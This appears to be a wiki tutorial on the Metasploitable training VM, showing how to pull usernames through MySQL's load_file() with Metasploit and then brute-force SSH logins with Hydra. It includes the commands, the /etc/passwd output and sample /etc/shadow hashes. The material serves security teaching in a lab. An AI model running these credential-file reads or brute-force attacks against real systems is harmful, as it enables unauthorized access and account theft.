This walks through using Hydra to brute-force login information on Metasploitable.

Aslo see Hydra.

Procedure

The first challenge, when cracking SSH credentials via brute force, is to find usernames. There are two methods to do this:

• Guess usernames from services
• Obtain usernames from a file on the machine

It would be great if we could log in via SSH as root, but this is usually disabled. To be successful, we will need a list of users on the system. This can be obtained many ways, but two methods using SQL servers are covered in Metasploitable/MySQL and Metasploitable/Postgres. Both pages cover techniques for obtaining /etc/passwd contents with metasploit.

Once we find usernames, we can try and crack the passwords.

• For password wordlists, use SecLists from Daniel Miessler on Github: https://github.com/danielmiessler/SecLists
• If we have usernames only, use Hydra to brute-force credentials
• If we have usernames and password hashes, use John the Ripper to brute-force credentials

Usernames

Finding Usernames via Services

Oftentimes services will create users and will not disable SSH for those accounts. If you're lucky, the security will be lower for these service usernames. For example, if a server is running Postgresql, there should be a "postgres" username, it may allow you to log in, and it may even have the password "postgres".

Finding Usernames via MySQL

Hydra can be used to brute-force the SSH credentials. If you have a good guess for the username and password, then use Hydra.

However, if you don't know what username to use, and you know there is a MySQL serer listening, you can crack the MySQL server's password, and use the load_file() function in SQL to obtain the /etc/passwd or /etc/shadow file, and use those to obtain usernames and possibly password hashes. These may in turn lead to SSH usernames and passwords. It's a bit cumbersome, but who knows, you might get lucky and find some low-hanging fruit.

Obtaining Usernames Using SQL load_file Function

Usernames on the machine can be obtained from /etc/passwd if we get SQL credentials on the remote machine, because SQL has a load_file() function.

Here's the recap of getting the contents of that file from the Metasploitable machine's MySQL server (username is root, password is blank) using Metasploit:

Start metasploit:

root@morpheus:~# msfconsole

We're going to use a MySQL exploit, so load it up:

msf > use auxiliary/admin/mysql/mysql_sql

Once we load the MySQL exploit, we have to set the username and password to use. This requires us to know the username/password. You can try an empty password, or the word "password", or etc. On Metasploitable, no MySQL password is set by default:

msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set PASSWORD ''
PASSWORD =>
msf auxiliary(mysql_sql) > set RHOST 10.0.0.27
RHOST => 10.0.0.27

Last, we set the SQL statement that we want Metasploit to run once it connects:

msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')
SQL => select load_file('/etc/passwd')
msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select load_file('/etc/passwd')'...
[*]  | root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
 |
[*] Auxiliary module execution completed

Reading /etc/shadow

We can also grab the /etc/shadow file, which contains password hashes. Some sample lines:

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

There are 8 fields here:

• Username : It is your login name.
• Password : It is your encrypted password. The password should be minimum 6-8 characters long including special characters/digits and more.
• Last password change (lastchanged) : Days since Jan 1, 1970 that password was last changed
• Minimum : The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password
• Maximum : The maximum number of days the password is valid (after that user is forced to change his/her password)
• Warn : The number of days before password is to expire that user is warned that his/her password must be changed
• Inactive : The number of days after password expires that account is disabled
• Expire : days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.

The most important two fields, then are the first two:

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

The root and sys users can both log in, and we have the hash of their passwords.

However, the * (or a ! character) in place of a password hash means that account cannot be used for remote logins.

This reduces the list of usable usernames to:

root@morpheus:~# cat users_file
root
sys
klog
msfadmin
postgres
user
service

Passwords

Hydra

Hydra is a brute-force SSH tool. It works by trying usernames/passwords remotely. It is very slow and should only be used as a last-ditch attempt.

Usage

If we just type hydra, we can see the basic usage:

root@morpheus:~# hydra 
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

From the help message, you can see Hydra supports cracking many more services than just SSH:

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

Reality Check

Quick reality check: brute-forcing SSH logins is very slow (limited by how many SSH connections a victim's SSH server will accept), so if you have access to /etc/shadow, you might as well crack those passwords offline with John the Ripper.

Using Hydra to Crack SSH Credentials

Once we have a list of users, we can put that in a file and pass it to Hydra using the -L flag. We then pass a list of passwords to try using the -P flag. Here's a sample command:

# hydra -L users_file -P 500-worst-passwords.txt ssh://10.0.0.27:22
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-25 21:45:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 3549 login tries (l:7/p:507), ~13 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 3505 todo in 01:20h, 4 active

This is extremely slow when compared to an offline password-cracking method like John the Ripper - if we have the /etc/shadow file, we should probably use that, instead of trying to brute-force SSH logins.

Brute-forcing SSH logins requires a lot of time, a lot of patience, and a series of very good guesses. In general, it is not terribly practical.

John the Ripper

If we are able to obtain a list of users and their password hashes, e.g., from /etc/shadow, we can use John to try and crack passwords via brute force offline.

Use John to Crack Credentials

See Metasploitable/John_Shadow_File

Metasploitable

You can also brute force an SSH login with Metasploitable - use the auxiliary/scanner/ssh/ssh_login module.

See Metasploitable/SSH/Exploits#Brute_Force_ssh_login

Flags

Metasploit any and all resources related to metasploit on this wiki MSF - on the metasploit framework generally Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload. Category:Security  · Category:Metasploit  · Category:Kali Flags  · Template:MetasploitFlag  · e

Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind Metasploitable Services: distcc: Metasploitable/distcc Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...) Fuzzing  · American Fuzzy Lop Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali Flags  · Template:MetasploitableRedTeamFlag  · e

Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions. Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping  · Metasploitable/Defenses/Detecting Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports Metasploitable Networking Defenses: Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali Flags  · Template:MetasploitableBlueTeamFlag  · e

ssh secure shell, the most useful tool in unix SSH  · Category:SSH Tunnels: Building SSH tunnels: SSH Tunnels Tunnel SSH through HTTPS: Stunnel Tunnel SSH through DNS: Iodine Raspberry Pi and SSH: RaspberryPi/Headless  · RaspberryPi/Reverse SSH RaspberryPi/SSH Stunnel  · RaspberryPi/Reverse SSH Stunnel Category:SSH  · Category:Networking Linux and SSH: Linux/SSH Metasploitable/SSH Category:SSH  · Category:Kali  · Category:Networking Flags  · Template:SSHFlag  · e